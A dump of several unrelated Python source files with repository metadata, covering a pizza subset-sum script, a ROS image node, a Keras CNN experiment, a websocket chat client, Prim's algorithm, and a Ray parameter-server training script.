(file) file = the file id that we will write into
(list) OG = original set of numbers
(list) numbers = list of pizza types that is changed throughout recursion
(int) target = the total number of pizzas we want
(list) partial = list placeholder we use to hold the different types of pizzas
Returns:
Nothing...recursion stops once all combinations are found
"""
s = sum(partial)
if s == target:
file.write(str(len(partial)))
file.write("\n")
for j in range(len(partial)):
file.write(str(OG.index(partial[j])))
if j < len(partial) - 1:
file.write(" ")
file.write("\n")
if s >= target:
return
for i in range(len(numbers)):
file.close()
if os.path.getsize(file_path) != 0:
return
file = open(file_path, "w")
n = numbers[i]
remaining = numbers[i+1:]
subset_sum(file_path, file, OG, remaining, target, partial + [n])
a_in = open("a_example.in", "r") # This opens the text file and saves it into a variable
b_in = open("b_small.in", "r")
c_in = open("c_medium.in", "r")
d_in = open("d_quite_big.in", "r")
e_in = open("e_also_big.in", "r")
# -----------------------------Change this to get different outputs--------------------
# Reads the entire file and saves it into list
# Replace......
# a_in --> b_in (input from example b)
# a_out --> b_out (output of example b)
# "a_out" --> b_out (path name of newly created output file)
lines = c_in.readlines() # Change a_in to b_in
a_out = open("c_out", "w") # Change "a_out" to b_out
file_path = "c_out" # Change "a_out" to b_out
#---------------------------------------------------------------------------------------
slices, types = map(int, lines[0].split()) # Splits the first line into int variales
pizzas = map(int, lines[1].split()) # Splits the 2nd line into list of integers
# This checks if the file is empty or not
# Can also use os.stat(file_path).st_size == 0 as condition
if os.path.getsize(file_path) == 0:
print "File is empty"
else:
print "File is not empty"
while os.path.getsize(file_path) == 0:
a_out = open(file_path, "w")
subset_sum(file_path, a_out, pizzas, pizzas, slices)
slices -= 1
# a_out.close()
if os.path.getsize(file_path) == 0:
print "File is empty"
else:
print "File is not empty"
a_in.close()
b_in.close()
c_in.close()
d_in.close()
e_in.close()
| [
"vzhao@e1z1r4p3.42.us.org"
] | vzhao@e1z1r4p3.42.us.org |
7725728c4396eab46cc3164cd5889e7d901b4a5f | 5a760a0ff2a1655e3fbddd621a181378ea092fcc | /StarWebBuilder/timeout.py | 0586ada83fff4c9164333ee84c45b29f1a458022 | [
"MIT"
] | permissive | taschetto/sublimeSettings | 7f8292737b6f413718d7e076b9bd08e0ef8a297d | 64bcb568c240b851efc914b102e0c57e1553d8c5 | refs/heads/master | 2020-03-26T05:45:59.888806 | 2016-09-14T15:34:11 | 2016-09-14T15:35:07 | 26,015,128 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 550 | py | from functools import wraps
import errno
import os
import signal
class TimeoutError(Exception):
pass
def timeout(seconds=10, error_message=os.strerror(errno.ETIME)):
def decorator(func):
def _handle_timeout(signum, frame):
raise TimeoutError(error_message)
def wrapper(*args, **kwargs):
signal.signal(signal.SIGALRM, _handle_timeout)
signal.alarm(seconds)
try:
result = func(*args, **kwargs)
finally:
signal.alarm(0)
return result
return wraps(func)(wrapper)
return decorator | [
"gtaschetto@gmail.com"
] | gtaschetto@gmail.com |
7948a9e20dfc18adb728f35ea7d8d4a1387faf1a | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2408/60670/279400.py | 462432fde739ac9f0e437d3408deb95a44e663a4 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 360 | py | def isPrime(x):
for i in range(2,int(x**0.5)+1):
if x%i!=0:
return False
return True
def factorial(n):
t=1
for i in range(1,n):
t*=i
return t%1000000007
n=int(input())
numOfPrime=0
for i in range(1,n+1):
if isPrime(i):
numOfPrime+=1
print((factorial(numOfPrime)*factorial(n-numOfPrime))%1000000007) | [
"1069583789@qq.com"
] | 1069583789@qq.com |
d482fc54652390d38a71486ad7896776534966ae | 64ad122b299e457e2b37fddf9b059bdbf5858ca8 | /src/pose_estimation/scripts/image_processor.py | b2db59ae85d4feec36eb2651722ef72e9337183a | [] | no_license | faheinrich/pose_project | 8218d140f6020bc56bad1ef7ac3a40e53a6a3053 | 23e4283358940f662e7b12d1ad98d7ebc3c2efe6 | refs/heads/main | 2023-05-12T21:06:14.628014 | 2021-06-01T20:27:19 | 2021-06-01T20:27:19 | 365,174,377 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,045 | py | #!/usr/bin/env python3
# Description:
# - Subscribes to real-time streaming video from your built-in webcam.
#
# Author:
# - Addison Sears-Collins
# - https://automaticaddison.com
# Import the necessary libraries
import rospy # Python library for ROS
from sensor_msgs.msg import Image # Image is the message type
from cv_bridge import CvBridge # Package to convert between ROS and OpenCV Images
import cv2 # OpenCV library
# import sys
# import time
# import logging
# import numpy as np
# import matplotlib.pyplot as plt
# import cv2
# from tf_pose import common
# from tf_pose.estimator import TfPoseEstimator
# from tf_pose.networks import get_graph_path, model_wh
pub = rospy.Publisher('view_this', Image, queue_size=1)
# """
# https://learnopencv.com/deep-learning-based-human-pose-estimation-using-opencv-cpp-python/
# """
# # Specify the paths for the 2 files
# protoFile = "/home/fabian/ros/catkin_ws/resources/cv2_net/pose/mpi/pose_deploy_linevec.prototxt"
# weightsFile = "/home/fabian/ros/catkin_ws/resources/cv2_net/pose/mpi/pose_iter_160000.caffemodel"
# # Read the network into Memory
# net = cv2.dnn.readNetFromCaffe(protoFile, weightsFile)
# inWidth = 368
# inHeight = 368
# threshold = 0.6
def process_frame(frame):
# frame = cv2.resize(frame, (inHeight, inWidth))
# # frame = cv2.resize(frame, (inHeight, inWidth))
# # Prepare the frame to be fed to the network
# inpBlob = cv2.dnn.blobFromImage(frame, 1.0 / 255, (inWidth, inHeight), (0, 0, 0), swapRB=False, crop=False)
# # Set the prepared object as the input blob of the network
# net.setInput(inpBlob)
# output = net.forward()
# rospy.loginfo(output.shape)
# H = output.shape[2]
# W = output.shape[3]
# # Empty list to store the detected keypoints
# points = []
# # 44 for mpi
# for i in range(44):
# # confidence map of corresponding body's part.
# probMap = output[0, i, :, :]
# # Find global maxima of the probMap.
# minVal, prob, minLoc, point = cv2.minMaxLoc(probMap)
# # Scale the point to fit on the original image
# x = (inWidth * point[0]) / W
# y = (inHeight * point[1]) / H
# if prob > threshold :
# cv2.circle(frame, (int(x), int(y)), 5, (0, 255, 255), thickness=-1, lineType=cv2.FILLED)
# # cv2.putText(frame, "{}".format(i), (int(x), int(y)), cv2.FONT_HERSHEY_SIMPLEX, 1.4, (0, 0, 255), 3, lineType=cv2.LINE_AA)
# # Add the point to the list if the probability is greater than the threshold
# points.append((int(x), int(y)))
# else :
# points.append(None)
# cv2.imshow("Output-Keypoints",frame)
# cv2.waitKey()
# for pair in POSE_PAIRS:
# partA = pair[0]
# partB = pair[1]
# if points[partA] and points[partB]:
# cv2.line(frameCopy, points[partA], points[partB], (0, 255, 0), 3)
# from rgb to bgr to show change
return frame[:,:,::-1]
def callback(data):
# Used to convert between ROS and OpenCV images
br = CvBridge()
# Output debugging information to the terminal
rospy.loginfo("receiving video frame")
# Convert ROS Image message to OpenCV image
received_frame = br.imgmsg_to_cv2(data)
rospy.loginfo('processing received image')
processed_frame = process_frame(received_frame)
pub.publish(br.cv2_to_imgmsg(processed_frame))
def receive_message():
# Tells rospy the name of the node.
# Anonymous = True makes sure the node has a unique name. Random
# numbers are added to the end of the name.
rospy.init_node('image_processor', anonymous=True)
# Node is subscribing to the video_frames topic
rospy.Subscriber('webcam_frames', Image, callback)
# spin() simply keeps python from exiting until this node is stopped
rospy.spin()
# Close down the video stream when done
cv2.destroyAllWindows()
if __name__ == '__main__':
receive_message()
| [
"faheinrich98@gmail.com"
] | faheinrich98@gmail.com |
955a3394f44e953f1a4c30c5c454af78e16f84da | a2477654a0fb85f9507389ff7a4b4a8bcc1641fa | /trydjango1-11/src/restaurants/migrations/0003_auto_20170926_1624.py | 5708b2f804f86a92b2d7213e1dbc4f79de3a24b5 | [] | no_license | ervinpepic/Django-11-Restaurant-app | 6ae1e2dec7571b0180ea991ca80b9b83d00cdb1b | a6bd976130c70621e6149ee64c61e1cdcec2acba | refs/heads/master | 2022-10-18T08:34:11.496044 | 2017-11-25T19:57:36 | 2017-11-25T19:57:36 | 111,400,182 | 0 | 1 | null | 2022-10-10T08:12:45 | 2017-11-20T11:13:00 | Python | UTF-8 | Python | false | false | 416 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-09-26 16:24
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('restaurants', '0002_restaurant_location'),
]
operations = [
migrations.RenameModel(
old_name='Restaurant',
new_name='RestaurantLocation',
),
]
| [
"ervin.hack@gmail.com"
] | ervin.hack@gmail.com |
85dedc26a7d0b18671e3606cefba8011ec6f33a6 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_156/521.py | ca8aafaec283d6e9fa857be6020a6168166a825e | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,635 | py | #!/usr/bin/python3
import sys
import math
ncases = int(sys.stdin.readline().strip())
for t in range(1, ncases+1):
d = int(sys.stdin.readline().strip())
values = sys.stdin.readline().strip().split()
pancakes = [int(x) for x in values]
pancakes.sort(reverse=True)
best = pancakes[0]
# Node format: List of diners with pancakes, number of special minutes
initial_node = [pancakes, 0]
queue = [initial_node]
while queue:
node = queue.pop(0)
diners = node[0]
special = node[1]
top = diners[0]
#if (top + special) >= best:
# continue
if (top + special) < best:
best = top + special
if top < 4:
continue
# Let's introduce new special minutes. Note _all_ diners with
# the max number of pancakes should be split (adding more special
# minuts), as splitting just one of them is stupid
for n in [2, 3, 4]:
splits = []
remainder = top
for i in range(0, n):
split = math.floor(remainder/(n-i))
remainder -= split
splits.append(split)
diners_after_special = list(diners)
new_special = special
while diners_after_special[0] == top:
diners_after_special.pop(0)
diners_after_special += splits
new_special += (n-1)
diners_after_special.sort(reverse=True)
new_node = [diners_after_special, new_special]
queue.append(new_node)
print("Case #{0}: {1}".format(t, best))
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
a4bc6700762042ba729d57d355527709795f6f6f | a19068d77efe49808ea54a2cdb1f64036248fbee | /experiments/CNN_BasicExpmnt.py | 61e841bdc706f2ff930a4c5325f94355a6b8fb27 | [] | no_license | sarneetk/NLP-Project | 6facb81a9307684f90c237192fcc824534dbfff5 | e5c483a763d5818365f8280292ac586638ba10ee | refs/heads/master | 2023-03-25T21:04:20.632517 | 2021-03-21T04:19:01 | 2021-03-21T04:19:01 | 344,712,064 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,309 | py | # CNN for the IMDB problem
from tensorflow import keras
from keras.datasets import imdb
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Flatten
from keras.layers.convolutional import Conv1D
from keras.layers.convolutional import MaxPooling1D
from keras.layers.embeddings import Embedding
from keras.preprocessing import sequence
from keras import backend as K
import matplotlib.pyplot as plt
plt.style.use('ggplot')
def plot_graph(history) :
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']
x = range(1, len(acc) + 1)
plt.figure(figsize=(12, 5))
plt.subplot(1, 2, 1)
plt.plot(x, acc, 'b', label='Training acc')
plt.plot(x, val_acc, 'r', label='Validation acc')
plt.title('Training and validation accuracy')
plt.legend()
plt.subplot(1, 2, 2)
plt.plot(x, loss, 'b', label='Training loss')
plt.plot(x, val_loss, 'r', label='Validation loss')
plt.title('Training and validation loss')
plt.legend()
plt.show()
def recall(y_true, y_pred):
y_true = K.ones_like(y_true)
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
all_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
if (true_positives!=0):
recall0 = true_positives / (all_positives + K.epsilon())
else:
recall0=0.0
return recall0
def precision(y_true, y_pred):
y_true = K.ones_like(y_true)
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))
if(true_positives!=0):
precision0 = true_positives / (predicted_positives + K.epsilon())
else:
precision0=0.0
return precision0
def f1_score(y_true, y_pred):
precision1 = precision(y_true, y_pred)
recall1 = recall(y_true, y_pred)
return 2* ((precision1 * recall1) / (precision1 + recall1 + K.epsilon()))
if __name__ == '__main__':
# load the dataset but only keep the top 5000 words, zero the rest
top_words = 5000
(X_train, y_train), (X_test, y_test) = imdb.load_data(num_words=top_words)
# pad dataset to a maximum review length in words
max_words = 500
X_train = sequence.pad_sequences(X_train, maxlen=max_words)
X_test = sequence.pad_sequences(X_test, maxlen=max_words)
# Define CNN Model
# first layer is the Embedded layer that uses 32 length vectors to represent each word.
# The next layer is the one dimensional CNN layer .
# Finally, because this is a classification problem we use a Dense output layer with a single neuron and
# a sigmoid activation function to make 0 or 1 predictions for the two classes (good and bad) in the problem.
embedding_vector_length = 32
model = Sequential()
model.add(Embedding(top_words, embedding_vector_length, input_length=max_words))
model.add(Conv1D(32, 3, padding='same', activation='relu'))
model.add(MaxPooling1D())
model.add(Flatten())
model.add(Dense(250, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy',f1_score, precision, recall])
model.summary()
# Fit the model
history=model.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=3, batch_size=128, verbose=2)
# Evaluation of the model with training data
scores_train = model.evaluate(X_train, y_train, verbose=0)
print("Training Data: ")
print("Accuracy: %.2f%%, F_1Score: %.2f%% , Precision: %.2f%%, Recall: %.2f%% " % (scores_train[1]*100,scores_train[2]*100,
scores_train[3]*100,scores_train[4]*100))
# Evaluation of the model with test data
scores = model.evaluate(X_test, y_test, verbose=0)
print("Test Data:")
print("Accuracy: %.2f%%, F_1Score: %.2f%% , Precision: %.2f%%, Recall: %.2f%%" % (scores[1] * 100,scores[2] * 100 ,
scores[3] * 100,scores[4] * 100))
# Plotting the graph
plot_graph(history) | [
"noreply@github.com"
] | sarneetk.noreply@github.com |
36815ed5dbc21619f0e347fd9614d4889ea71b0d | bfb882c400956861fccd40bf1fb53cd6ddcba41e | /hagelslag/processing/__init__.py | 947f56449e95c6deffd11da0f81a50f94c71a716 | [
"MIT"
] | permissive | stsaten6/hagelslag | 3b1b07cf424997686b3320c538a188c790232bd7 | 6b7d0779a0b0ac4bd26fbe4931b406fad1ef9f9e | refs/heads/master | 2020-03-10T17:38:44.528943 | 2018-04-12T20:50:38 | 2018-04-12T20:50:38 | 129,504,847 | 2 | 0 | MIT | 2018-04-14T09:58:37 | 2018-04-14T09:58:37 | null | UTF-8 | Python | false | false | 524 | py | from .EnhancedWatershedSegmenter import EnhancedWatershed
from .EnsembleProducts import MachineLearningEnsembleProducts, EnsembleProducts, EnsembleConsensus
from .Hysteresis import Hysteresis
from .ObjectMatcher import ObjectMatcher, TrackMatcher
from .ObjectMatcher import mean_minimum_centroid_distance, centroid_distance, shifted_centroid_distance, nonoverlap, \
mean_min_time_distance, start_centroid_distance, start_time_distance, closest_distance
from .STObject import STObject, read_geojson
from .tracker import * | [
"djgagne@ou.edu"
] | djgagne@ou.edu |
fad84be7b3588e086eaa4f7158e430de704c6e85 | e35d35b22f11be27f439900e97248b7cab7aa85e | /client.py | beb1d0771d531e912584b4e968bc4f762d483a90 | [] | no_license | jkaria/chat-server | e1903912e047180077eb4b2bf9b7d2db1637fe33 | b92e0af97a1d4105d070b15951c91d7e406c39ab | refs/heads/master | 2020-03-20T23:08:22.980615 | 2018-06-22T04:14:42 | 2018-06-22T04:14:42 | 137,831,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,458 | py | import websocket
import _thread as thread
import sys
import re
import json
def on_message(ws, message):
print(f"received > {message}")
def on_error(ws, error):
print(f"error > {error}")
def on_close(ws):
print("Server connection closed")
def on_open(ws):
def run(*args):
msg_format = re.compile("(.+):\s(.+)")
while True:
msg = input("<Enter message in format 'to_user_id: msg' (enter 'quit' to exit)>:\n")
if msg == 'quit':
break
m = msg_format.match(msg)
if not m:
print("invalid message format")
continue
ws.send(json.dumps({'to_user_id': m[1], 'message': m[2]}))
print(f"< sending: {m[2]}...")
ws.close()
print("Closed connection. Thread terminating...")
#TODO: look into async input to get read of this thread
thread.start_new_thread(run, ())
def connect_to_server(srv_port, username):
websocket.enableTrace(True)
ws = websocket.WebSocketApp(f"ws://localhost:{srv_port}/client/{username}",
on_message = on_message,
on_error = on_error,
on_close = on_close)
ws.on_open = on_open
ws.run_forever()
if len(sys.argv) != 3:
print("Correct usage: server.py <server_port_number> <username>")
exit(1)
connect_to_server(int(sys.argv[1]), str(sys.argv[2]))
| [
""
] | |
f21193e2e28fe1cc390d4ae97c312250c7ab7a79 | 947577e28fc58aa7505cc4da0de5ed454c7229ea | /DataStatistics/config/conf_database.py | c9f7c7a7d70b2da3783ef587323eb50427be3d7c | [] | no_license | chuxuan909/Tornado | 32064f110d49af8ff93b93ba9a8af1bb481452dc | 8946405de99dad8720c92248b9ebd06bdfe3c61f | refs/heads/master | 2020-09-05T14:08:20.462058 | 2019-11-08T09:52:40 | 2019-11-08T09:52:40 | 220,128,751 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,731 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from sqlalchemy import create_engine
#mysql连接配置
database_config={
"passwd":"xxxxxxxxx", # 数据库密码
"user":"xxx", # 数据库用户
"url":"xxx.xxx.xxx.xxx", # 数据库地址
"port":3306, # 数据库连接端口
"dbs":{'userdb1':'gHallSvrShardInfo_0','userdb2':'gHallSvrSingleInfo_0',} # mysql连接的库名称
}
#mongo连接配置
database_mongo_config ={
"passwd": "", # 数据库密码
"user": "", # 数据库用户
"url": "xxx.xxxxxx", # 数据库地址,测试
"port": "27017", # 数据库连接端口
"db":"GHall",
"collection":{"col1":"gameCoinDetail","col2":"userPut","col3":"userPutRank"}
}
#redis连接配置
database_redis_config ={
"passwd": "", # redis密码
"user": "", # redis用户
"url": "xxx.xxx.xxx.xxx", # redis地址
"port": "6379", # redis连接端口
"db":2, # redis使用的库
}
def get_arg(info):
'''
获取配置参数
:param info: key
:return: 配置参数
'''
try:
return database_config[info]
except KeyError:
return None
def get_mongo_arg(info):
'''
获取配置参数
:param info: key
:return: 配置参数
'''
try:
return database_mongo_config[info]
except KeyError:
return None
def get_redis_arg(info):
'''
获取配置参数
:param info: key
:return: 配置参数
'''
try:
return database_redis_config[info]
except KeyError:
return None
def test_db():
'''
尝试连接数据库
:return:
'''
for value in get_arg('dbs').values():
engine = create_engine('mysql+pymysql://%s:%s@%s:%d/%s' % (
get_arg('user'), get_arg('passwd'), get_arg('url'), get_arg('port'), value), max_overflow=15,
echo=False)
try:
dbs_name=engine.execute('show databases')
if dbs_name:
print("连接 >>%s:%d<< MySql数据库 [[%s]] 成功" % (get_arg('url'),get_arg('port'),value))
dbs_name.close()
except Exception as err:
print("数据库连接失败... 请检查连接配置和数据库服务器配置")
print(err)
if __name__ == "__main__":
print('数据库地址 : %s ' % get_arg('url'))
print('数据库连接端口 %d' % get_arg('port'))
for index in get_arg('dbs').keys():
print('连接的数据库 %s 名称为 : %s' % (index, get_arg('dbs')[index]))
raw=input("是否测试数据库连接? [Y/N]\t")
if raw == "Y" or raw == "y":
test_db()
else:
pass
| [
"305958872@qq.com"
] | 305958872@qq.com |
2354d06939d6c72e5399a441a3e3c362fe7451e0 | 65e2f1f1daaaf175b09d0863f6ed77c77129fed6 | /c/personal/algo_007/programming_assignments/algo_002/1/prim/prim_bkp.py | a4a4efd5fb5b32000cb176f21d8e90f7d077059b | [] | no_license | ausanyal/code | 86b010613eb5b9dc0ada717e0db8e21f4ede8961 | a359f9cfb650d57ce88c39dc0e15dce19a5324bd | refs/heads/master | 2021-01-01T15:39:34.985446 | 2018-05-07T01:47:02 | 2018-05-07T01:47:02 | 97,669,433 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,539 | py | #!/usr/bin/python
import sys
import collections
from decimal import Decimal
f = open('input', 'r')
lines = f.readlines()
nv = 0
ne = 0
d = {}
for line in lines:
if ne == 0:
nv,ne = line.split(' ')
else:
u,v,e = map(int, line.split(' '))
if u not in d.keys():
d[u] = {}
d[u]['ud'] = {}
if e not in d[u]['ud'].keys():
d[u]['ud'][e] = []
d[u]['ud'][e].append(v)
d[u]['od'] = collections.OrderedDict(sorted(d[u]['ud'].items()))
def find_smallest_cut(pd):
le_key = Decimal('Infinity')
ct = 0
# we need to explore a new edge per iter
# v cannot point to an existing vertex already explored
for u in pd.keys():
if u == 500:
continue
if u not in d.keys():
#print "u: ", 6, "not in keys"
continue
for e in d[u]['od'].keys():
for v in d[u]['od'][e]:
if v in pd.keys():
#print "v", v, "for u", u, "in pd.keys", pd.keys()
del d[u]['od'][e]
ct = ct + 1
le_u = None
for u in pd.keys():
if u == 500:
continue
if u not in d.keys():
#print "u: ", 6, "not in keys"
continue
if len(d[u]['od'].keys()) > 0:
#print "1. u: ", u, "pd.keys: ", pd.keys(), "d[u]['od'].keys()[0] : ", d[u]['od'].keys()[0]
if d[u]['od'].keys()[0] < le_key:
le_u = u
le_key = d[le_u]['od'].keys()[0]
if le_u is not None:
v = d[le_u]['od'][le_key][0]
#print "3. ", le_key, "u: ", le_u, "v: ", v
return le_u, v, le_key
else:
print "(((((((((((((((((((((((((( ERROR ))))))))))))))))))))))))))", ct
return 0, 0, 0
i = 1
count = 0
w = 0
pd = {}
# add i to pd
#print "************* Adding ", i, "to pd ", pd.keys()
pd[i] = []
while (count < nv):
u, v, le_key = find_smallest_cut(pd)
pd[u] = [ v, le_key ]
if v not in pd.keys() and (v != 0):
# add v to pd
pd[v] = []
w = w + le_key
print "************* Adding ", u, "-", v, "to pd ", pd.keys(), "e: ", le_key, "w: ", w
#del d[u]['od'][le_key]
count = count + 1
#print "7: ", u, v, le_key, " pd.keys: ", pd.keys(), "count: ", count, "w: ", w, "len: ", len(pd.keys())
if len(pd.keys()) == int(nv):
print "Done"
break
'''
def find_smallest_cut(pd):
le_key = Decimal('Infinity')
for u in pd.keys():
print "1. u: ", u, "pd.keys: ", pd.keys()
#print "2. ", d[u]
if d[u]['od'].keys()[0] < le_key:
le_u = u
le_key = d[le_u]['od'].keys()[0]
# for this le get first v from the list of (u, v1) or (u, v2) ...
v = d[le_u]['od'][le_key][0]
# we need to explore a new edge per iter
# v cannot point to an existing vertex already explored
if v in pd.keys():
print "2: v: ", v, "is in pd.keys"
del d[le_u]['od'][le_key]
print "3: remaining in le_u: ", le_u, "keys: ", d[le_u]['od']
le_key = Decimal('Infinity')
if d[u]['od'].keys()[0] is not None:
le_key = d[le_u]['od'].keys()[0]
continue
#print "3. ", le_key
#print "4. ", le_key, le_u
#print "5. ", d[le_u]
v = d[le_u]['od'][le_key][0]
#print "6. ", le_u, v, le_key
return le_u, v, le_key
'''
| [
"aubin.sanyal@gmail.com"
] | aubin.sanyal@gmail.com |
feb3861b0c0a06a508fdf4a0748c05fe0b8f72be | 0f00c8a02e8dc1d8136b2afc92338108f92cc6ae | /recipes/mrbayes/run_test.py | 40033ea2ed9721ad50dfc69b067eccb43cef93ff | [] | no_license | faircloth-lab/conda-recipes | 3714f5be83753261bf3abc70454bdf6b7028c8d6 | 75a520a75a357ea47ee80262f3c3a6dfe1b0715f | refs/heads/master | 2021-01-20T07:07:05.705307 | 2015-06-16T13:50:18 | 2015-06-16T13:50:18 | 12,671,015 | 2 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,416 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
(c) 2013 Brant Faircloth || http://faircloth-lab.org/
All rights reserved.
This code is distributed under a 3-clause BSD license. Please see
LICENSE.txt for more information.
Created on 30 December 2013 16:33 PST (-0800)
"""
import unittest
import subprocess
class TestMb(unittest.TestCase):
def test_mb(self):
cmd = ["mb", "-h"]
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
self.stdout, self.stderr = proc.communicate()
text = [v.strip() for k, v in enumerate(self.stdout.split("\n"))
if k in range(0, 6, 2)]
assert text == [
'',
'MrBayes v3.2.2 x64',
'(Bayesian Analysis of Phylogeny)'
]
class TestMbMpi(unittest.TestCase):
def test_mb(self):
cmd = ["mb-mpi", "-h"]
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
self.stdout, self.stderr = proc.communicate()
text = [v.strip() for k, v in enumerate(self.stdout.split("\n"))
if k in range(0, 6, 2)]
assert text == [
'MrBayes v3.2.2 x64',
'(Bayesian Analysis of Phylogeny)',
'(Parallel version)'
]
if __name__ == '__main__':
unittest.main()
| [
"brant@faircloth-lab.org"
] | brant@faircloth-lab.org |
8c49afcd2557458371bc37031be00356b871799d | 092e00ae8389811929a381637b73dcb2303fefeb | /blog/domain/user.py | 338592ec2da4b0e0020f532f84602d13ba2ace07 | [] | no_license | uiandwe/rest_framework_ex | 33cfb73e386785009b1d012a3dfa6909bdc74ab3 | 8130bcf9a6ffd67b91906c85d66ed9d8d453bab8 | refs/heads/master | 2022-11-27T20:56:26.911462 | 2021-10-12T07:46:17 | 2021-10-12T07:46:17 | 234,095,110 | 0 | 0 | null | 2022-11-22T05:17:55 | 2020-01-15T14:12:34 | Python | UTF-8 | Python | false | false | 220 | py | # -*- coding: utf-8 -*-
class User:
def __init__(self, email, username):
self.email = email
self.username = username
def __repr__(self):
return "{}, {}".format(self.email, self.username)
| [
"uiandwe@gmail.com"
] | uiandwe@gmail.com |
01963dfede8f5f05b7ffa0c3d4400f87db8be7ca | eae1829b4a629571a9e3821760cf6c7e2547b300 | /cifar_asgd_new.py | dfb193cce4191c71d4b11ca0ad712fe51cb6f42a | [] | no_license | zdpau/Sync-Async_PS | 1b3131a3a7d135bb3d62896ca3dd74ba6d18aa30 | 86a1c71960b70d86cad9c6f97a8a3932a1cb79ff | refs/heads/master | 2021-07-21T10:16:34.547532 | 2018-12-19T09:29:39 | 2018-12-19T09:29:39 | 140,381,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,144 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import ray
import tensorflow as tf
import cifar10
import cifar10_train
import time
from collections import deque
import random
import sys
numLoops = 5000
FLAGS = tf.app.flags.FLAGS
# tf.app.flags.DEFINE_string('param_name', 'default_val, 'description')
tf.app.flags.DEFINE_string('train_dir', 'cifar10_train',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_integer('max_steps', 1000000,
"""Number of batches to run.""")
tf.app.flags.DEFINE_integer('log_frequency', 10,
"""How often to log results to the console.""")
tf.app.flags.DEFINE_integer('num_examples', 10000,
"""Number of examples to run.""")
tf.app.flags.DEFINE_integer('num_nodes', 1,
"""Number of nodes.""")
tf.app.flags.DEFINE_float('delay', 0, """delay""")
tf.app.flags.DEFINE_boolean('sync', False, """synchronous mode""")
tf.app.flags.DEFINE_boolean('serial', False, """serial mode""")
def t():
return time.time()
@ray.remote
class ParameterServer(object):
def __init__(self, keys, values, num_nodes):
self.grad_buf = deque()
values = [value.copy() for value in values]
self.weights = dict(zip(keys, values))
self.num_nodes = num_nodes
def push(self, keys, values):
# print (a)
timeline = (t(), keys, values)
#print(timeline)
self.grad_buf.append(timeline)
# print (grad_buf)
def update(self, keys, values):
for key, value in zip(keys, values):
self.weights[key] += value / self.num_nodes
def pull(self, keys):
tau0 = t()
while len(self.grad_buf) > 0:
if self.grad_buf[0][0] < tau0 - FLAGS.delay:
entry = self.grad_buf.popleft()
self.update(entry[1], entry[2])
else:
break
return [self.weights[key] for key in keys]
@ray.remote
class Worker(object):
def __init__(self, ps, num, zero):
self.net = cifar10_train.Train()
self.keys = self.net.get_weights()[0]
self.zero = zero
self.num = num
self.ps = ps
self.counter = 0
self.indexes = list(range(len(self.net.images)))
random.shuffle(self.indexes)
weights = ray.get(self.ps.pull.remote(self.keys))
self.net.set_weights(self.keys, weights)
self.addr = ray.services.get_node_ip_address()
def execOne(self, c):
index = self.indexes[c % len(self.net.images)]
im = self.net.images[index]
lb = self.net.labels[index]
gradients = self.net.compute_update(im,lb)
print ("LOSS {} {} {:.6f} {}".format(self.num, c, time.time() - self.zero, self.net.lossval))
sys.stdout.flush()
return gradients
def computeOneCycle(self):
weights = ray.get(self.ps.pull.remote(self.keys))
self.net.set_weights(self.keys, weights)
gradients = self.execOne(self.counter)
self.counter += 1
self.ps.push.remote(self.keys, gradients)
return 1 # dummy to sync
def go(self, times, independent=False):
for c in range(times):
if independent:
self.execOne(c)
else:
self.computeOneCycle()
return 1
def get_addr(self):
return self.addr
def createWorkers(num_workers, ps, zero):
''' create one worker per one node '''
hosts = []
workers = []
counter = 0
while counter < num_workers:
worker = Worker.remote(ps, counter, zero)
addr = ray.get(worker.get_addr.remote())
if addr in hosts:
''' throw away worker '''
continue
workers.append(worker)
hosts.append(addr)
counter += 1
return workers
def main(argv=None):
# tf.app.flags.FLAGS._parse_flags(sys.argv)
# cifar10.maybe_download_and_extract()
if tf.gfile.Exists(FLAGS.train_dir):
tf.gfile.DeleteRecursively(FLAGS.train_dir)
tf.gfile.MakeDirs(FLAGS.train_dir)
ray.init(num_gpus=2)
net = cifar10_train.Train()
all_keys, all_values = net.get_weights()
ps = ParameterServer.remote(all_keys, all_values, FLAGS.num_nodes)
zero = time.time()
